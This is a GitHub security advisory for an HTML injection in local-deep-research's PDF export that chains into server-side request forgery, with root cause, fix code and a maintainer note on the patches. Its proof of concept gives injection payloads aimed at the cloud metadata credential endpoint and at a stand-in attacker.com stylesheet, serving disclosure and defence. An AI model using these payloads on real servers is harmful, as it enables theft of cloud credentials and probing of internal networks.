CVSS Score: 5 (CVSS 3.1)

CVE-2026-43979: local-deep-research is Vulnerable to HTML Injection via Unescaped User Input in PDF Export (`pdf_service.py:_markdown_to_html`)

Summary

PDFService._markdown_to_html() constructs an HTML document by interpolating user-controlled values — specifically title (sourced from research.title or research.query) and metadata key-value pairs — directly into an f-string without any HTML escaping. An authenticated attacker can craft a research query containing HTML special characters to inject arbitrary HTML tags into the document processed by WeasyPrint during PDF export. This injection can be chained to trigger a Server-Side Request Forgery (SSRF), bypassing the application's existing SSRF defenses in ssrf_validator.py.

Details

Vulnerable code: src/local_deep_research/web/services/pdf_service.py, lines 171–176

# pdf_service.py:171-176
if title:
    html_parts.append(f"<title>{title}</title>")   # ← title is not escaped

if metadata:
    for key, value in metadata.items():
        html_parts.append(f'<meta name="{key}" content="{value}">')  # ← key/value are not escaped

Data flow trace:

User input: research.query
        │
        ▼
research_routes.py:1321
  pdf_title = research.title or research.query
        │
        ▼
research_routes.py:1325-1326
  export_report_to_memory(report_content, format, title=pdf_title)
        │
        ▼
pdf_service.py:107
  PDFService.markdown_to_pdf(markdown_content, title=pdf_title)
        │
        ▼
pdf_service.py:137
  _markdown_to_html(markdown_content, title, metadata)
        │
        ▼
pdf_service.py:172
  f"<title>{title}</title>"   ← injection point, no escaping
        │
        ▼
pdf_service.py:112
  HTML(string=html_content)   ← WeasyPrint renders the injected HTML

research.query is a string submitted by the user via POST /api/start_research, stored as-is in the database, and retrieved without any sanitization. When the user triggers POST /api/v1/research/<research_id>/export/pdf, this value is embedded unescaped into the HTML document processed by WeasyPrint.

Injection point 1: <title> tag breakout

Input:    </title><img src="http://169.254.169.254/latest/meta-data/" />
Rendered: <title></title><img src="http://169.254.169.254/latest/meta-data/" /></title>

When WeasyPrint encounters the injected <img> tag, its default behavior is to issue an HTTP GET request to the URL given in src.

Injection point 2: <meta> attribute breakout

Input:    " /><link rel="stylesheet" href="http://attacker.com/evil.css
Rendered: <meta name="..." content="" /><link rel="stylesheet" href="http://attacker.com/evil.css">

WeasyPrint will fetch and apply the external stylesheet, which also constitutes SSRF.
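
Both breakouts can be reproduced without the application or WeasyPrint. The following is a minimal sketch, not the project's actual code: build_head_vulnerable is a hypothetical helper that mirrors the unescaped f-string interpolation quoted above, and the "author" metadata key is an assumption chosen only for illustration.

```python
def build_head_vulnerable(title, metadata):
    """Mimic the unescaped f-string interpolation (hypothetical helper)."""
    html_parts = []
    if title:
        # No escaping: any "</title>" in the input closes the element early.
        html_parts.append(f"<title>{title}</title>")
    if metadata:
        for key, value in metadata.items():
            # No escaping: a double quote in the input ends the attribute.
            html_parts.append(f'<meta name="{key}" content="{value}">')
    return html_parts


title_payload = '</title><img src="http://169.254.169.254/latest/meta-data/" />'
meta_payload = '" /><link rel="stylesheet" href="http://attacker.com/evil.css'

# "author" is an illustrative metadata key, not taken from the advisory.
parts = build_head_vulnerable(title_payload, {"author": meta_payload})
for part in parts:
    print(part)
```

The two printed lines match the "Rendered" strings shown for injection points 1 and 2, with name="author" standing in for the elided metadata name.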

Proof of Concept

Step 1: Log in and submit a research query containing the injection payload

POST /api/start_research HTTP/1.1
Host: localhost:5000
Content-Type: application/json
Cookie: session=<valid_session>

{
  "query": "</title><img src=\"http://169.254.169.254/latest/meta-data/iam/security-credentials/\" onerror=\"x\"/>",
  "mode": "quick",
  "model_provider": "OLLAMA",
  "model": "llama3"
}

The response returns a research_id, e.g. "aaaa-bbbb-cccc-dddd".

Step 2: After the research completes, trigger PDF export

POST /api/v1/research/aaaa-bbbb-cccc-dddd/export/pdf HTTP/1.1
Host: localhost:5000
Cookie: session=<valid_session>
X-CSRFToken: <csrf_token>

Step 3: Intermediate HTML constructed server-side

<!DOCTYPE html><html><head>
<meta charset="utf-8">
<title></title><img src="http://169.254.169.254/latest/meta-data/iam/security-credentials/" onerror="x"/></title>
</head><body>
...report content...
</body></html>

Step 4: WeasyPrint issues an outbound HTTP request to the injected URL

Observed in network monitoring (e.g. tcpdump) or the target internal service logs:

GET /latest/meta-data/iam/security-credentials/ HTTP/1.1
Host: 169.254.169.254
User-Agent: WeasyPrint/...

Lightweight verification (no SSRF environment required):

Set the query to:

</title><title>INJECTED

The resulting HTML will contain two <title> tags and the PDF document metadata title will read INJECTED, confirming successful injection.
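
The same check can be automated if the intermediate HTML is available, for example in a unit test. The sketch below assumes the document head is built the way the advisory describes; count_title_tags is a hypothetical helper, and the regular expression is a rough heuristic rather than a full HTML parser.

```python
import re


def count_title_tags(html_document):
    """Count opening <title> tags, ignoring case and any attributes."""
    return len(re.findall(r"<title\b[^>]*>", html_document, flags=re.IGNORECASE))


query = "</title><title>INJECTED"

# Reproduce the unescaped interpolation for the lightweight payload.
vulnerable_html = f"<html><head><title>{query}</title></head><body></body></html>"
benign_html = "<html><head><title>Quarterly report</title></head><body></body></html>"

print(count_title_tags(vulnerable_html))  # more than one opening tag means injection
print(count_title_tags(benign_html))
```

A count greater than one indicates that the title value broke out of its element.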

Impact

1. Chained SSRF (High Severity)

When an attacker injects <img src>, <link href>, or <style>@import url() constructs that point to internal addresses, WeasyPrint issues HTTP requests on behalf of the server during PDF generation. This allows access to:

Cloud metadata services (169.254.169.254) on AWS, GCP, or Azure — enabling theft of IAM credentials and instance identity documents.
Internal network services (192.168.x.x, 10.x.x.x) — enabling reconnaissance and interaction with internal APIs not exposed to the internet.
Localhost administrative interfaces — if SSRF protections are only applied at the user-input validation layer.

This is an effective bypass of the application's existing SSRF defenses in ssrf_validator.py, because WeasyPrint's outbound resource requests are never routed through that validator.

2. HTML Document Structure Corruption

Injected tags can prematurely close <head> and insert arbitrary content into <body>, causing WeasyPrint to render incorrectly or crash, resulting in a Denial of Service (DoS) condition for the export functionality.

3. CSS Injection (Medium Severity)

By injecting <link> or <style> tags that load external stylesheets, an attacker can fully control the visual content of the generated PDF, enabling report content forgery or spoofing.

4. Affected Scope

All PDF export operations are affected.
The vulnerability is reachable by any authenticated user — no elevated privileges required.
Because each user operates against their own encrypted database, cross-user exploitation is not possible. However, on any shared or multi-tenant deployment, every authenticated user can independently trigger this vulnerability.

Remediation

Apply html.escape() to all user-controlled values before embedding them in the HTML template inside _markdown_to_html:

import html

if title:
    html_parts.append(f"<title>{html.escape(title)}</title>")

if metadata:
    for key, value in metadata.items():
        html_parts.append(
            f'<meta name="{html.escape(str(key))}" content="{html.escape(str(value))}">'
        )
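
To see why this closes both injection points, the escaped construction can be exercised against the payloads from the Details section. This is a sketch under assumptions: build_head_escaped is a hypothetical stand-alone helper, not the patched function itself, and the "author" key is illustrative.

```python
import html


def build_head_escaped(title, metadata):
    """Build <title> and <meta> tags with html.escape() applied (hypothetical helper)."""
    html_parts = []
    if title:
        html_parts.append(f"<title>{html.escape(title)}</title>")
    if metadata:
        for key, value in metadata.items():
            html_parts.append(
                f'<meta name="{html.escape(str(key))}" content="{html.escape(str(value))}">'
            )
    return html_parts


parts = build_head_escaped(
    '</title><img src="http://169.254.169.254/latest/meta-data/" />',
    {"author": '" /><link rel="stylesheet" href="http://attacker.com/evil.css'},
)
for part in parts:
    print(part)
```

html.escape() converts quotes as well as angle brackets by default (quote=True). That default is what prevents the attribute breakout in the <meta> case, so it should not be turned off here.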

Additionally, consider configuring WeasyPrint with a custom url_fetcher that blocks or restricts outbound HTTP requests to prevent SSRF via injected or legitimately-embedded external resources:

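import weasyprint
from weasyprint import HTML

# Import path depends on the project layout; adjust as needed.
from ssrf_validator import validate_url

def safe_url_fetcher(url, timeout=10):
    # Refuse any resource URL that the SSRF validator does not accept.
    if not validate_url(url):
        raise ValueError(f"Blocked unsafe URL in PDF rendering: {url}")
    return weasyprint.default_url_fetcher(url, timeout=timeout)

html_doc = HTML(string=html_content, url_fetcher=safe_url_fetcher)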

Report generated against commit f3540fb3 — local-deep-research, branch main.

Maintainer note (2026-04-24)

Thanks @Firebasky for the detailed report. The complete remediation spans two PRs, both merged to main:

#3082 (merged 2026-03-29, shipped in v1.5.0+) — closes the HTML-injection sinks:

html.escape() now wraps the title value in <title>…</title>
Same for metadata keys/values in <meta name="…" content="…">
Regression tests added in tests/web/services/test_pdf_service.py

#3613 (merged 2026-04-24, shipped in v1.6.0) — implements the url_fetcher recommendation from the Remediation section:

New _safe_url_fetcher in pdf_service.py delegates to weasyprint.default_url_fetcher only after security.ssrf_validator.validate_url accepts the URL
Blocks AWS metadata (169.254.169.254), RFC1918, loopback, and non-http(s) schemes
Covers the chained SSRF path through any URL reaching the rendered HTML — markdown body, citations, raw-HTML passthrough via Python-Markdown
Blocked URLs raise UnsafePDFResourceURLError (a ValueError subclass) so WeasyPrint skips the resource and the render continues
8 regression tests, including an end-to-end render with <img src="http://169.254.169.254/…"> embedded in the body
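
The blocking rules listed above can be approximated with the standard library alone. The sketch below is not the project's ssrf_validator or _safe_url_fetcher: is_url_allowed, BlockedResourceURLError, and make_safe_fetcher are hypothetical names, and the check only inspects IP literals. A production validator would also need to resolve hostnames and check every resulting address.

```python
import ipaddress
from urllib.parse import urlsplit


class BlockedResourceURLError(ValueError):
    """Hypothetical error type raised when a resource URL is refused."""


def is_url_allowed(url):
    """Return False for non-http(s) schemes and internal IP literals."""
    try:
        parts = urlsplit(url)
    except ValueError:
        return False
    if parts.scheme not in ("http", "https"):
        return False
    host = parts.hostname
    if not host:
        return False
    try:
        address = ipaddress.ip_address(host)
    except ValueError:
        # Assumption: hostnames pass here. A real validator would resolve
        # the name and apply the same address checks to each result.
        return True
    return not (
        address.is_private        # RFC 1918 ranges and similar
        or address.is_loopback    # 127.0.0.0/8, ::1
        or address.is_link_local  # 169.254.0.0/16, including cloud metadata
        or address.is_unspecified
    )


def make_safe_fetcher(delegate):
    """Wrap a fetch callable so that refused URLs never reach it."""
    def fetcher(url):
        if not is_url_allowed(url):
            raise BlockedResourceURLError(f"Blocked unsafe URL: {url}")
        return delegate(url)
    return fetcher


# Stand-in delegate for illustration; no network access is performed.
fetch = make_safe_fetcher(lambda url: "fetched:" + url)
print(is_url_allowed("http://169.254.169.254/latest/meta-data/"))
print(fetch("https://8.8.8.8/logo.png"))
```

Wrapping the delegate instead of calling a fetch function directly keeps the policy testable without a network or a PDF renderer.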

Advisory metadata: CVSS vector CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N (5.0 Moderate); CWEs: CWE-79 and CWE-918. Patched in v1.6.0; upgrade to v1.6.0 or later to receive both fixes.

(GitHub Advisory)

Technical Details

Package Name	Ecosystem	Vulnerable Versions	First Patched Version
local-deep-research	pip	< 1.6.0	1.6.0

Root Cause Analysis

The vulnerability is an HTML injection in the PDF export functionality of the local-deep-research application, which can be chained to achieve Server-Side Request Forgery (SSRF). The core of the vulnerability lies in the PDFService._markdown_to_html function, where user-controlled input (title and metadata) is used to construct an HTML document without proper sanitization or escaping. This allows an attacker to inject arbitrary HTML tags.

The injected HTML is then processed by the WeasyPrint library within the PDFService.markdown_to_pdf function. In its vulnerable state, this function did not restrict WeasyPrint's ability to fetch external resources. Consequently, an attacker could inject an <img> or <link> tag with a src or href attribute pointing to an internal network address. When WeasyPrint renders the PDF, it makes a request to this internal address on behalf of the server, leading to SSRF. This could allow an attacker to access cloud provider metadata services, internal APIs, or other sensitive resources.

The remediation was applied in two stages. First, the HTML injection was fixed in _markdown_to_html by applying html.escape() to the user-provided data. Second, as a defense-in-depth measure, markdown_to_pdf was updated to use a custom url_fetcher that validates and blocks requests to internal or unsafe URLs, preventing the SSRF vector.

Vulnerable functions

PDFService._markdown_to_html

src/local_deep_research/web/services/pdf_service.py

This function constructs an HTML document by directly embedding the `title` and `metadata` values from user input into an f-string without any HTML escaping. An attacker can provide a malicious string with HTML tags, which are then rendered as part of the document, leading to HTML injection. This is the root cause of the vulnerability.
